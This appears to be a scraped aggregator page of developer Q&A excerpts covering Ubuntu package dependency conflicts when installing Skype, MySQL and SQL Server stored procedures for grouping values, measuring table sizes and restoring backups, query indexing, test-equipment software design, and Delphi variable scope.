It is hard to predict where the assemblies in that list live on a given machine, and which version, x86 or x64, should be used. It is a pity that the integration of SQL with .NET is this rough. · In a couple of cases the new WCF-NetMsmq port was not able to work with the queue. Try replacing the WCF-NetMsmq port with a WCF-Custom port using netMsmqBinding; that worked fine for me. · To test how messages go through the queue, you can turn on the Journal/Enabled option for the queue. I used the QueueExplorer utility to look at the messages in the Journal. Computer Management can also show the messages, but it displays only a small part of the message body, and in a weird format. QueueExplorer does a better job: it shows the whole body, and XML messages appear nicely color-formatted.

    Read the article

  • Why does apt-get install Skype easily while aptitude complains about MAJOR dependency errors?

    - by Prateek
    I was trying to install Skype on Ubuntu 13.04, from the Canonical repositories. With apt-get it worked easily, while aptitude had a huge problem with dependencies and proposed a complicated solution. Why is this so? Why doesn't aptitude offer whatever apt-get does as a potential solution? Here is the output of both: apt-get install skype: Reading package lists... Building dependency tree... Reading state information... The following extra packages will be installed: gcc-4.7-base:i386 libasound2 libasound2:i386 libasound2-plugins:i386 libasyncns0:i386 libaudio2:i386 libavahi-client3:i386 libavahi-common-data:i386 libavahi-common3:i386 libc6:i386 libcomerr2:i386 libcups2:i386 libdbus-1-3 libdbus-1-3:i386 libdbusmenu-qt2:i386 libdrm-intel1 libdrm-intel1:i386 libdrm-nouveau2 libdrm-nouveau2:i386 libdrm-radeon1 libdrm-radeon1:i386 libdrm2 libdrm2:i386 libexpat1:i386 libffi6:i386 libflac8:i386 libfontconfig1:i386 libfreetype6:i386 libgcc1:i386 libgcrypt11 libgcrypt11:i386 libgl1-mesa-dri libgl1-mesa-dri:i386 libgl1-mesa-glx:i386 libglapi-mesa:i386 libglib2.0-0:i386 libgnutls26 libgnutls26:i386 libgpg-error0:i386 libgssapi-krb5-2:i386 libgstreamer-plugins-base0.10-0:i386 libgstreamer0.10-0:i386 libice6:i386 libjack-jackd2-0:i386 libjbig0:i386 libjpeg-turbo8:i386 libjpeg8:i386 libjson0:i386 libk5crypto3:i386 libkeyutils1:i386 libkrb5-3:i386 libkrb5support0:i386 liblcms1:i386 libllvm3.2:i386 liblzma5:i386 libmng1:i386 libmysqlclient18:i386 libogg0:i386 liborc-0.4-0:i386 libp11-kit0:i386 libpciaccess0:i386 libpcre3:i386 libpng12-0:i386 libpulse0:i386 libqt4-dbus libqt4-dbus:i386 libqt4-declarative libqt4-declarative:i386 libqt4-designer libqt4-help libqt4-network libqt4-network:i386 libqt4-opengl libqt4-opengl:i386 libqt4-script libqt4-script:i386 libqt4-scripttools libqt4-sql libqt4-sql:i386 libqt4-sql-mysql:i386 libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xml:i386 libqt4-xmlpatterns libqt4-xmlpatterns:i386 libqtcore4 libqtcore4:i386 libqtgui4 libqtgui4:i386 libqtwebkit4:i386 libsamplerate0:i386 libselinux1:i386 libsm6:i386 libsndfile1:i386 libspeexdsp1:i386 libsqlite3-0:i386 libssl1.0.0 libssl1.0.0:i386 libstdc++6:i386 libtasn1-3:i386 libtiff5 libtiff5:i386 libtxc-dxtn-s2tc0:i386 libuuid1:i386 libvorbis0a:i386 libvorbisenc2:i386 libwrap0:i386 libx11-6 libx11-6:i386 libx11-xcb1 libx11-xcb1:i386 libxau6:i386 libxcb-dri2-0 libxcb-dri2-0:i386 libxcb-glx0 libxcb-glx0:i386 libxcb1 libxcb1:i386 libxdamage1:i386 libxdmcp6:i386 libxext6 libxext6:i386 libxfixes3 libxfixes3:i386 libxi6 libxi6:i386 libxml2 libxml2:i386 libxrender1 libxrender1:i386 libxslt1.1:i386 libxss1:i386 libxt6 libxt6:i386 libxv1 libxv1:i386 libxxf86vm1 libxxf86vm1:i386 mysql-common qdbus skype-bin:i386 sni-qt:i386 zlib1g:i386 Suggested packages: nas:i386 glibc-doc:i386 locales:i386 rng-tools rng-tools:i386 libglide3 libglide3:i386 gnutls-bin gnutls-bin:i386 krb5-doc:i386 krb5-user:i386 libvisual-0.4-plugins:i386 gstreamer-codec-install:i386 gnome-codec-install:i386 gstreamer0.10-tools:i386 gstreamer0.10-plugins-base:i386 jackd2:i386 liblcms-utils:i386 pulseaudio:i386 libqt4-declarative-folderlistmodel libqt4-declarative-gestures libqt4-declarative-particles libqt4-declarative-shaders qt4-qmlviewer libqt4-declarative-folderlistmodel:i386 libqt4-declarative-gestures:i386 libqt4-declarative-particles:i386 libqt4-declarative-shaders:i386 qt4-qmlviewer:i386 libqt4-dev libqt4-dev:i386 libthai0:i386 libicu48:i386 qt4-qtconfig qt4-qtconfig:i386 Recommended packages: libtxc-dxtn0:i386 xml-core:i386 The following NEW packages 
will be installed gcc-4.7-base:i386 libasound2:i386 libasound2-plugins:i386 libasyncns0:i386 libaudio2:i386 libavahi-client3:i386 libavahi-common-data:i386 libavahi-common3:i386 libc6:i386 libcomerr2:i386 libcups2:i386 libdbus-1-3:i386 libdbusmenu-qt2:i386 libdrm-intel1:i386 libdrm-nouveau2:i386 libdrm-radeon1:i386 libdrm2:i386 libexpat1:i386 libffi6:i386 libflac8:i386 libfontconfig1:i386 libfreetype6:i386 libgcc1:i386 libgcrypt11:i386 libgl1-mesa-dri:i386 libgl1-mesa-glx:i386 libglapi-mesa:i386 libglib2.0-0:i386 libgnutls26:i386 libgpg-error0:i386 libgssapi-krb5-2:i386 libgstreamer-plugins-base0.10-0:i386 libgstreamer0.10-0:i386 libice6:i386 libjack-jackd2-0:i386 libjbig0:i386 libjpeg-turbo8:i386 libjpeg8:i386 libjson0:i386 libk5crypto3:i386 libkeyutils1:i386 libkrb5-3:i386 libkrb5support0:i386 liblcms1:i386 libllvm3.2:i386 liblzma5:i386 libmng1:i386 libmysqlclient18:i386 libogg0:i386 liborc-0.4-0:i386 libp11-kit0:i386 libpciaccess0:i386 libpcre3:i386 libpng12-0:i386 libpulse0:i386 libqt4-dbus:i386 libqt4-declarative:i386 libqt4-network:i386 libqt4-opengl:i386 libqt4-script:i386 libqt4-sql:i386 libqt4-sql-mysql:i386 libqt4-xml:i386 libqt4-xmlpatterns:i386 libqtcore4:i386 libqtgui4:i386 libqtwebkit4:i386 libsamplerate0:i386 libselinux1:i386 libsm6:i386 libsndfile1:i386 libspeexdsp1:i386 libsqlite3-0:i386 libssl1.0.0:i386 libstdc++6:i386 libtasn1-3:i386 libtiff5:i386 libtxc-dxtn-s2tc0:i386 libuuid1:i386 libvorbis0a:i386 libvorbisenc2:i386 libwrap0:i386 libx11-6:i386 libx11-xcb1:i386 libxau6:i386 libxcb-dri2-0:i386 libxcb-glx0:i386 libxcb1:i386 libxdamage1:i386 libxdmcp6:i386 libxext6:i386 libxfixes3:i386 libxi6:i386 libxml2:i386 libxrender1:i386 libxslt1.1:i386 libxss1:i386 libxt6:i386 libxv1:i386 libxxf86vm1:i386 mysql-common skype skype-bin:i386 sni-qt:i386 zlib1g:i386 The following packages will be upgraded: libasound2 libdbus-1-3 libdrm-intel1 libdrm-nouveau2 libdrm-radeon1 libdrm2 libgcrypt11 libgl1-mesa-dri libgnutls26 libqt4-dbus libqt4-declarative libqt4-designer libqt4-help libqt4-network libqt4-opengl libqt4-script libqt4-scripttools libqt4-sql libqt4-sql-sqlite libqt4-svg libqt4-test libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libssl1.0.0 libtiff5 libx11-6 libx11-xcb1 libxcb-dri2-0 libxcb-glx0 libxcb1 libxext6 libxfixes3 libxi6 libxml2 libxrender1 libxt6 libxv1 libxxf86vm1 qdbus 41 upgraded, 105 newly installed, 0 to remove and 138 not upgraded. Need to get 85.9 MB/89.2 MB of archives. After this operation, 204 MB of additional disk space will be used. Do you want to continue [Y/n]? aptitude install skype: Reading package lists... Building dependency tree... Reading state information... Reading extended state information... Initialising package states... 
The following NEW packages will be installed: gcc-4.7-base:i386{a} libasound2:i386{a} libasound2-plugins:i386{a} libasyncns0:i386{a} libaudio2:i386{a} libavahi-client3:i386{a} libavahi-common-data:i386{a} libavahi-common3:i386{a} libc6:i386{a} libcomerr2:i386{a} libcups2:i386{a} libdbus-1-3:i386{a} libdbusmenu-qt2:i386{a} libdrm-intel1:i386{a} libdrm-nouveau2:i386{a} libdrm-radeon1:i386{a} libdrm2:i386{a} libexpat1:i386{a} libffi6:i386{a} libflac8:i386{a} libfontconfig1:i386{a} libfreetype6:i386{a} libgcc1:i386{a} libgcrypt11:i386{a} libgl1-mesa-dri:i386{a} libgl1-mesa-glx:i386{a} libglapi-mesa:i386{a} libglib2.0-0:i386{a} libgnutls26:i386{a} libgpg-error0:i386{a} libgssapi-krb5-2:i386{a} libgstreamer-plugins-base0.10-0:i386{a} libgstreamer0.10-0:i386{a} libice6:i386{a} libjack-jackd2-0:i386{a} libjbig0:i386{a} libjpeg-turbo8:i386{a} libjpeg8:i386{a} libjson0:i386{a} libk5crypto3:i386{a} libkeyutils1:i386{a} libkrb5-3:i386{a} libkrb5support0:i386{a} liblcms1:i386{a} libllvm3.2:i386{a} liblzma5:i386{a} libmng1:i386{a} libmysqlclient18:i386{a} libogg0:i386{a} liborc-0.4-0:i386{a} libp11-kit0:i386{a} libpciaccess0:i386{a} libpcre3:i386{a} libpng12-0:i386{a} libpulse0:i386{a} libqt4-dbus:i386{a} libqt4-declarative:i386{a} libqt4-network:i386{a} libqt4-opengl:i386{a} libqt4-script:i386{a} libqt4-sql:i386{a} libqt4-sql-mysql:i386{a} libqt4-xml:i386{a} libqt4-xmlpatterns:i386{a} libqtcore4:i386{a} libqtgui4:i386{a} libqtwebkit4:i386{a} libsamplerate0:i386{a} libselinux1:i386{a} libsm6:i386{a} libsndfile1:i386{a} libspeexdsp1:i386{a} libsqlite3-0:i386{a} libssl1.0.0:i386{a} libstdc++6:i386{a} libtasn1-3:i386{a} libtiff5:i386{a} libtxc-dxtn-s2tc0:i386{a} libuuid1:i386{a} libvorbis0a:i386{a} libvorbisenc2:i386{a} libwrap0:i386{a} libx11-6:i386{a} libx11-xcb1:i386{a} libxau6:i386{a} libxcb-dri2-0:i386{a} libxcb-glx0:i386{a} libxcb1:i386{a} libxdamage1:i386{a} libxdmcp6:i386{a} libxext6:i386{a} libxfixes3:i386{a} libxi6:i386{a} libxml2:i386{a} libxrender1:i386{a} libxslt1.1:i386{a} libxss1:i386{a} libxt6:i386{a} libxv1:i386{a} libxxf86vm1:i386{a} mysql-common{a} skype skype-bin:i386{a} sni-qt:i386{a} zlib1g:i386{a} The following packages will be upgraded: libasound2 libdbus-1-3 libdrm-intel1 libdrm-nouveau2 libdrm-radeon1 libdrm2 libgcrypt11 libgl1-mesa-dri libgnutls26 libqt4-dbus libqt4-declarative libqt4-network libqt4-opengl libqt4-script libqt4-sql libqt4-xml libqt4-xmlpatterns libqtcore4 libqtgui4 libssl1.0.0 libtiff5 libx11-6 libx11-xcb1 libxcb-dri2-0 libxcb-glx0 libxcb1 libxext6 libxfixes3 libxi6 libxml2 libxrender1 libxt6 libxv1 libxxf86vm1 qdbus 35 packages upgraded, 105 newly installed, 0 to remove and 144 not upgraded. Need to get 81.7 MB/85.0 MB of archives. After unpacking 204 MB will be used. The following packages have unmet dependencies: libqt4-test : Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. libqt4-designer : Depends: libqt4-script (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqt4-xml (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtgui4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. libqt4-sql-sqlite : Depends: libqt4-sql (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. 
libqt4-help : Depends: libqt4-network (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqt4-sql (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtgui4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. libqt4-svg : Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtgui4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. libqt4-scripttools : Depends: libqt4-script (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtcore4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. Depends: libqtgui4 (= 4:4.8.4+dfsg-0ubuntu9) but 4:4.8.4+dfsg-0ubuntu9.2 is to be installed. The following actions will resolve these dependencies: Remove the following packages: 1) account-plugin-aim 2) account-plugin-facebook 3) account-plugin-flickr 4) account-plugin-generic-oauth 5) account-plugin-google 6) account-plugin-jabber 7) account-plugin-salut 8) account-plugin-twitter 9) account-plugin-windows-live 10) account-plugin-yahoo 11) empathy 12) friends 13) friends-dispatcher 14) friends-facebook 15) friends-twitter 16) gir1.2-signon-1.0 17) gnome-control-center-signon 18) libaccount-plugin-1.0-0 19) libfriends0 20) libqt4-designer 21) libqt4-help 22) libqt4-scripttools 23) libqt4-sql-sqlite 24) libqt4-svg 25) libqt4-test 26) libsignon-glib1 27) mcp-account-manager-uoa 28) nautilus-sendto-empathy 29) python-qt4 30) shotwell 31) signon-plugin-oauth2 32) signon-plugin-password 33) signon-ui 34) signond 35) ubuntu-sso-client-qt 36) ubuntuone-control-panel-qt 37) unity-lens-friends 38) unity-lens-photos 39) unity-scope-gdrive 40) webaccounts-extension-common 41) xul-ext-webaccounts Leave the following dependencies unresolved: 42) mcp-account-manager-uoa recommends gnome-control-center-signon 43) mcp-account-manager-uoa recommends account-plugin-aim 44) mcp-account-manager-uoa recommends account-plugin-jabber 45) mcp-account-manager-uoa recommends account-plugin-google 46) mcp-account-manager-uoa recommends account-plugin-facebook 47) mcp-account-manager-uoa recommends account-plugin-windows-live 48) mcp-account-manager-uoa recommends account-plugin-yahoo 49) mcp-account-manager-uoa recommends account-plugin-salut 50) ubuntu-desktop recommends empathy 51) ubuntu-desktop recommends libqt4-sql-sqlite 52) ubuntu-desktop recommends shotwell 53) ubuntu-desktop recommends ubuntuone-control-panel-qt 54) ubuntu-desktop recommends xul-ext-webaccounts 55) unity recommends unity-lens-photos 56) unity recommends unity-lens-friends 57) unity-lens-files recommends unity-scope-gdrive 58) libqt4-sql recommends libqt4-sql-mysql | libqt4-sql-odbc | libqt4-sql-ps Accept this solution? [Y/n/q/?] And in case this helps, aptitude show skype: Package: skype State: not installed Version: 4.2.0.11-0ubuntu0.12.04.2 Priority: extra Section: net Maintainer: Steve Langasek <[email protected]> Architecture: amd64 Uncompressed Size: 62.5 k Depends: skype-bin Conflicts: skype Description: client for Skype VOIP and instant messaging service Skype is software that enables the world's conversations. Millions of individuals and businesses use Skype to make free video and voice calls, send instant messages and share files with other Skype users. Every day, people also use Skype to make low-cost calls to landlines and mobiles. 
* Make free Skype-to-Skype calls to anyone else, anywhere in the world. * Call to landlines and mobiles at great rates. * Group chat with up to 200 people or conference call with up to 25 others. * Free to download.

    Read the article

  • Grouping a comma separated value on common data [closed]

    - by Ankit
I have a table with col1 (an int id), col2 (a varchar holding comma-separated values), and a third column for assigning a group number to each row. The table looks like:

col1 col2 group
..............................
1 2,3,4
2 5,6
3 1,2,5
4 7,8
5 11,3
6 22,8

This is only a sample of the real data. I have to assign a group number to each row in such a way that the output looks like:

col1 col2 group
..............................
1 2,3,4 1
2 5,6 1
3 1,2,5 1
4 7,8 2
5 11,3 1
6 22,8 2

The logic for assigning the group number is that rows whose col2 strings share a value must all get the same group number: everywhere a '2' appears in col2, the row gets the same group number, and because 2,3,4 appear together, all three of those values, wherever they appear in col2, are assigned the same group. The tricky part: 2,3,4 and 1,2,5 both contain 2, so all of the integers 1,2,3,4,5 must be assigned the same group number. I tried a stored procedure using MATCH ... AGAINST on col2 but am not getting the desired result. Most importantly, I can't use normalization, because I can't afford to build a new table from my original table, which has millions of records; normalization is not helpful in my context anyway. This question is also on Stack Overflow with a bounty. What I have achieved so far: I set the group column to auto-increment and then wrote this procedure:

BEGIN
declare col1_new, group_new int;
declare col2_new varchar(100);
declare done tinyint default 0;
declare cur1 cursor for select col1, col2, `group` from company;
DECLARE CONTINUE HANDLER FOR NOT FOUND SET done=1;
open cur1;
REPEAT
fetch cur1 into col1_new, col2_new, group_new;
update company set `group` = group_new where match(col2) against(concat("'", col2_new, "'"));
until done end repeat;
close cur1;
select * from company;
END

This procedure runs without syntax errors, but I am still not getting exactly the desired result.
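What the poster describes is a connected-components problem: integers that ever appear together in one col2 value belong to one component, and each row's group is the component of its values. As an illustration only (not the poster's code, and run outside MySQL), here is a minimal union-find sketch in C# that reproduces the desired output and emits one UPDATE per row; the table and column names follow the question:

    using System;
    using System.Collections.Generic;

    // Sketch: assign group numbers with union-find (disjoint sets).
    // Rows would come from "select col1, col2 from company"; hard-coded here.
    class GroupAssigner
    {
        static Dictionary<int, int> parent = new Dictionary<int, int>();

        static int Find(int x)
        {
            if (!parent.ContainsKey(x)) parent[x] = x;
            if (parent[x] != x) parent[x] = Find(parent[x]); // path compression
            return parent[x];
        }

        static void Union(int a, int b) => parent[Find(a)] = Find(b);

        static void Main()
        {
            var rows = new Dictionary<int, int[]>
            {
                [1] = new[] { 2, 3, 4 }, [2] = new[] { 5, 6 },  [3] = new[] { 1, 2, 5 },
                [4] = new[] { 7, 8 },    [5] = new[] { 11, 3 }, [6] = new[] { 22, 8 },
            };

            // Values listed together in one row belong to the same component.
            foreach (var vals in rows.Values)
                for (int i = 1; i < vals.Length; i++)
                    Union(vals[0], vals[i]);

            // Number the components 1, 2, ... and emit one UPDATE per row.
            var groupNo = new Dictionary<int, int>();
            foreach (var row in rows)
            {
                int root = Find(row.Value[0]);
                if (!groupNo.ContainsKey(root)) groupNo[root] = groupNo.Count + 1;
                Console.WriteLine(
                    $"UPDATE company SET `group` = {groupNo[root]} WHERE col1 = {row.Key};");
            }
        }
    }

For the sample data this prints groups 1, 1, 1, 2, 1, 2 for rows 1 through 6, matching the desired output.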

    Read the article

  • Determine All SQL Server Table Sizes

I'm doing some work to migrate and optimize a large-ish (40GB) SQL Server database at the moment.  Moving such a database between data centers over the Internet is not without its challenges.  In my case, virtually all of the size of the database is the result of one table, which has over 200M rows of data.  To determine the size of this table on disk, you can run the sp_spaceused stored procedure, like so: EXEC sp_spaceused lq_ActivityLog This returns the table's row count along with its reserved, data, index, and unused sizes. Of course, this shows only one table; if you have a lot of tables and need to know which ones are taking up the most space, it would be nice to run a query that lists all of the tables, ordered by the space they're taking up.  Thanks to Mitchel Sellers (and Gregg Stark's CURSOR template) and a tiny bit of my own edits, now you can!  Create the stored procedure below and call it to see a listing of all user tables in your database, ordered by their reserved space.

-- Lists space used for all user tables
CREATE PROCEDURE GetAllTableSizes
AS
DECLARE @TableName VARCHAR(100)
DECLARE tableCursor CURSOR FORWARD_ONLY
FOR select [name] from dbo.sysobjects where OBJECTPROPERTY(id, N'IsUserTable') = 1
FOR READ ONLY
CREATE TABLE #TempTable
(
    tableName varchar(100),
    numberofRows varchar(100),
    reservedSize varchar(50),
    dataSize varchar(50),
    indexSize varchar(50),
    unusedSize varchar(50)
)
OPEN tableCursor
WHILE (1=1)
BEGIN
    FETCH NEXT FROM tableCursor INTO @TableName
    IF(@@FETCH_STATUS<>0) BREAK;
    INSERT #TempTable EXEC sp_spaceused @TableName
END
CLOSE tableCursor
DEALLOCATE tableCursor
UPDATE #TempTable SET reservedSize = REPLACE(reservedSize, ' KB', '')
SELECT tableName 'Table Name',
       numberofRows 'Total Rows',
       reservedSize 'Reserved KB',
       dataSize 'Data Size',
       indexSize 'Index Size',
       unusedSize 'Unused Size'
FROM #TempTable
ORDER BY CONVERT(bigint, reservedSize) DESC
DROP TABLE #TempTable
GO
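On SQL Server 2005 and later, the same listing can also be produced without a cursor by querying the sys.dm_db_partition_stats DMV; this variant is an addition of mine, not from the original article, though the view and its columns are standard:

-- Reserved space per user table, largest first (pages are 8 KB).
SELECT t.name AS [Table Name],
       SUM(CASE WHEN ps.index_id IN (0, 1) THEN ps.row_count ELSE 0 END) AS [Total Rows],
       SUM(ps.reserved_page_count) * 8 AS [Reserved KB]
FROM sys.dm_db_partition_stats AS ps
JOIN sys.tables AS t ON t.object_id = ps.object_id
GROUP BY t.name
ORDER BY [Reserved KB] DESC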

    Read the article

  • Why is my query soooooo slow?

    - by geekrutherford
A stored procedure used in our production environment recently became so slow it caused the calling web service to begin timing out. When running the stored procedure in Query Analyzer, it took nearly 3 minutes to complete.   The stored procedure itself does little more than create a small bit of dynamic SQL which calls a view with a where clause at the end.   At first the thought was that the query used within the view needed to be optimized. The query is quite long, and therefore it was easy to jump to this conclusion.   Fortunately, after bringing the issue to the attention of a coworker, they asked "is there a where clause, and if so, is there an index on the column(s) in it?" I had no idea and quickly said as much. A quick check on the table/column utilized in the where clause indicated there was indeed no index.   Before adding the index, and after admitting I am no SQL wiz, I checked the internet for info on the difference between clustered and non-clustered indexes. I found the following site quite helpful: OdeToCode. After adding the non-clustered index on the column, the query that used to take nearly 3 minutes now takes 10 seconds! Ah, if only I'd thought to do this ahead of time!
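For anyone who wants to replicate the fix, it amounts to a single DDL statement. The table and column names below are hypothetical, since the post doesn't name the real ones:

-- Hypothetical names; substitute the real table and where-clause column.
CREATE NONCLUSTERED INDEX IX_MyTable_FilterColumn
    ON dbo.MyTable (FilterColumn)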

    Read the article

  • Advice on whether to use scripting, run time compile or something else

    - by Gaz83
    I work in the production area at my workplace, and I design and create the software that runs our automated test equipment. Every time I get involved with a new machine I end up with a different and (hopefully) better design. Anyway, I have come to the point where I feel I need to start standardizing all the machines on the same program. I see a problem when it comes to applying updates, as at the moment the test procedures are hard-coded into the program at each station. I need to be able to update the core program without affecting the testing section. The way I see it, this will mean splitting the program into 2 sections:

    Main UI - This is the core that talks to everything on the machine, such as cameras, sensors, the printer etc., and is a standalone application.
    Test Procedure - These are the steps that are executed every time the machine runs through a test.

    The main UI will load the test procedure and execute it whenever a test is required. My question is: what is the best approach to this, in terms of having an application load a file and execute the code within it? Take into account that the code in the test procedure will need access to public methods on the UI/core system to communicate with sensors etc. I have heard about MS Roslyn and had a quick look; would this solve my issue?

    Read the article

  • Restoring multiple database backups in a transaction

    - by Raghu Dodda
    I wrote a stored procedure that restores a set of database backups. It takes two parameters - a source directory and a restore directory. The procedure looks for all .bak files in the source directory (recursively) and restores all the databases. The stored procedure works as expected, but it has one issue - if I uncomment the try-catch statements, the procedure terminates with the following error:

        error_number   = 3013
        error_severity = 16
        error_state    = 1
        error_message  = DATABASE is terminating abnormally.

    The weird part is that sometimes (it is not consistent) the restore is done even if the error occurs. The procedure:

        create proc usp_restore_databases
        (
            @source_directory varchar(1000),
            @restore_directory varchar(1000)
        )
        as
        begin
            declare @number_of_backup_files int
            -- begin transaction
            -- begin try

            -- step 0: Initial validation
            if(right(@source_directory, 1) <> '\') set @source_directory = @source_directory + '\'
            if(right(@restore_directory, 1) <> '\') set @restore_directory = @restore_directory + '\'

            -- step 1: Put all the backup files in the specified directory in a table --
            declare @backup_files table ( file_path varchar(1000))
            declare @dos_command varchar(1000)
            set @dos_command = 'dir ' + '"' + @source_directory + '*.bak" /s/b'
            /* DEBUG */ print @dos_command
            insert into @backup_files(file_path) exec xp_cmdshell @dos_command
            delete from @backup_files where file_path IS NULL
            select @number_of_backup_files = count(1) from @backup_files
            /* DEBUG */ select * from @backup_files
            /* DEBUG */ print @number_of_backup_files

            -- step 2: restore each backup file --
            declare backup_file_cursor cursor for select file_path from @backup_files
            open backup_file_cursor

            declare @index int; set @index = 0
            while(@index < @number_of_backup_files)
            begin
                declare @backup_file_path varchar(1000)
                fetch next from backup_file_cursor into @backup_file_path
                /* DEBUG */ print @backup_file_path

                -- step 2a: parse the full backup file name to get the DB file name.
                declare @db_name varchar(100)
                set @db_name = right(@backup_file_path, charindex('\', reverse(@backup_file_path)) -1) -- still has the .bak extension
                /* DEBUG */ print @db_name
                set @db_name = left(@db_name, charindex('.', @db_name) -1)
                /* DEBUG */ print @db_name
                set @db_name = lower(@db_name)
                /* DEBUG */ print @db_name

                -- step 2b: find out the logical names of the mdf and ldf files
                declare @mdf_logical_name varchar(100), @ldf_logical_name varchar(100)
                declare @backup_file_contents table
                (
                    LogicalName nvarchar(128),
                    PhysicalName nvarchar(260),
                    [Type] char(1),
                    FileGroupName nvarchar(128),
                    [Size] numeric(20,0),
                    [MaxSize] numeric(20,0),
                    FileID bigint,
                    CreateLSN numeric(25,0),
                    DropLSN numeric(25,0) NULL,
                    UniqueID uniqueidentifier,
                    ReadOnlyLSN numeric(25,0) NULL,
                    ReadWriteLSN numeric(25,0) NULL,
                    BackupSizeInBytes bigint,
                    SourceBlockSize int,
                    FileGroupID int,
                    LogGroupGUID uniqueidentifier NULL,
                    DifferentialBaseLSN numeric(25,0) NULL,
                    DifferentialBaseGUID uniqueidentifier,
                    IsReadOnly bit,
                    IsPresent bit
                )
                insert into @backup_file_contents
                    exec ('restore filelistonly from disk=' + '''' + @backup_file_path + '''')
                select @mdf_logical_name = LogicalName from @backup_file_contents where [Type] = 'D'
                select @ldf_logical_name = LogicalName from @backup_file_contents where [Type] = 'L'
                /* DEBUG */ print @mdf_logical_name + ', ' + @ldf_logical_name

                -- step 2c: restore
                declare @mdf_file_name varchar(1000), @ldf_file_name varchar(1000)
                set @mdf_file_name = @restore_directory + @db_name + '.mdf'
                set @ldf_file_name = @restore_directory + @db_name + '.ldf'
                /* DEBUG */ print 'mdf_logical_name = ' + @mdf_logical_name + '|' +
                                  'ldf_logical_name = ' + @ldf_logical_name + '|' +
                                  'db_name = ' + @db_name + '|' +
                                  'backup_file_path = ' + @backup_file_path + '|' +
                                  'restore_directory = ' + @restore_directory + '|' +
                                  'mdf_file_name = ' + @mdf_file_name + '|' +
                                  'ldf_file_name = ' + @ldf_file_name
                restore database @db_name
                    from disk = @backup_file_path
                    with move @mdf_logical_name to @mdf_file_name,
                         move @ldf_logical_name to @ldf_file_name

                -- step 2d: iterate
                set @index = @index + 1
            end
            close backup_file_cursor
            deallocate backup_file_cursor

            -- end try
            -- begin catch
            --     print error_message()
            --     rollback transaction
            --     return
            -- end catch
            -- commit transaction
        end

    Does anybody have any ideas why this might be happening? Another question: is the transaction code useful? That is, if there are 2 databases to be restored, will SQL Server undo the restore of the first database if the second restore fails?
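    One hedged observation on the transaction question: SQL Server does not allow BACKUP or RESTORE statements inside an explicit transaction, so the commented-out transaction cannot provide all-or-nothing semantics across the restores - and that restriction is consistent with the 3013 "terminating abnormally" error only appearing when the transaction/try-catch code is uncommented. A minimal sketch of the failing pattern (the path and database name are hypothetical):

        -- Fails: RESTORE cannot run inside a user transaction.
        BEGIN TRANSACTION;
        RESTORE DATABASE SomeDb FROM DISK = 'C:\backups\SomeDb.bak';
        COMMIT TRANSACTION;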

    Read the article

  • Declare Locally or Globally in Delphi?

    - by lkessler
    I have a procedure my program calls tens of thousands of times that uses a generic structure like this:

        procedure PrintIndiEntry(JumpID: string);
        type
          TPeopleIncluded = record
            IndiPtr: pointer;
            Relationship: string;
          end;
        var
          PeopleIncluded: TList<TPeopleIncluded>;
          PI: TPeopleIncluded;
        begin { PrintIndiEntry }
          PeopleIncluded := TList<TPeopleIncluded>.Create;
          { A loop here that determines a small number (up to 100) people to process }
          while ... do
          begin
            PI.IndiPtr := ...;
            PI.Relationship := ...;
            PeopleIncluded.Add(PI);
          end;
          DoSomeProcess(PeopleIncluded);
          PeopleIncluded.Clear;
          PeopleIncluded.Free;
        end; { PrintIndiEntry }

    Alternatively, I can declare PeopleIncluded globally rather than locally, as follows:

        unit process;

        interface

        type
          TPeopleIncluded = record
            IndiPtr: pointer;
            Relationship: string;
          end;

        var
          PeopleIncluded: TList<TPeopleIncluded>;
          PI: TPeopleIncluded;

        procedure PrintIndiEntry(JumpID: string);
        begin { PrintIndiEntry }
          { A loop here that determines a small number (up to 100) people to process }
          while ... do
          begin
            PI.IndiPtr := ...;
            PI.Relationship := ...;
            PeopleIncluded.Add(PI);
          end;
          DoSomeProcess(PeopleIncluded);
          PeopleIncluded.Clear;
        end; { PrintIndiEntry }

        procedure InitializeProcessing;
        begin
          PeopleIncluded := TList<TPeopleIncluded>.Create;
        end;

        procedure FinalizeProcessing;
        begin
          PeopleIncluded.Free;
        end;

    My question is whether in this situation it is better to declare PeopleIncluded globally rather than locally. I know the theory is to declare locally whenever possible, but I would like to know if there are any issues to worry about with regard to doing tens of thousands of "create"s and "free"s. Making the list global means only one create and one free. What is the recommended method to use in this case? If the recommended method is still to declare it locally, then I'm wondering if there are any situations where it is better to declare globally when declaring locally is still an option.

    Read the article

  • Unstructured Data - The future of Data Administration

